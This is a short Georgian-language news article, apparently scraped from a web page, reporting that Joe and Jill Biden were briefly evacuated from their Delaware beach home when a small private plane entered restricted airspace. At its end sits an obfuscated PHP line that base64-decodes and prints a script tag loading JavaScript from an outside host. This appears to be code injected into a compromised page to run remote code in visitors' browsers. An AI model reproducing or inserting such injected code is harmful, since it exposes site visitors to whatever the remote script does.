celsiusi
ავერსი შნაიდერი
დელავერის რეზიდენციიდან, აშშ-ის პრეზიდენტისა და პირველი ლედის ევაკუაცია განხორციელდა. ინფორმაციას ამის შესახებ "სიენენი" ოფიციალურ პირზე დაყრდნობით ავრცელებს.
 
ოფიციალური პირის თქმით, ჯო და ჯილ ბაიდენები დელავერის შტატში, დასახლება რეჰიბოთ ბიჩში მდებარე სახლში ისვენებდნენ, როდესაც აკრძალულ საჰაერო სივრცეში, მცირე ზომის კერძო თვითმფრინავი შეამჩნიეს, რის გამოც აშშ-ის პრეზიდენტისა და პირველი ლედის ევაკუაცია განხორციელდა.
 
"მცირე ზომის კერძო თვითმფრინავი აკრძალულ საჰაერო სივრცეში შევიდა, მიღებულ იქნა უსაფრთხოებისთვის საჭირო ზომები. პრეზიდენტსა და მის ოჯახს საფრთხე არ ემუქრება",– განაცხადა ოფიციალურმა პირმა.
 
ოფიციალური პირის ცნობით, აკრძალულ ზონაში თვითმფრინავი შეცდომით მოხვდა და პილოტთან კომუნიკაციის შემდეგ, ის აღნიშნული ზონიდან გაიყვანეს.
717
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");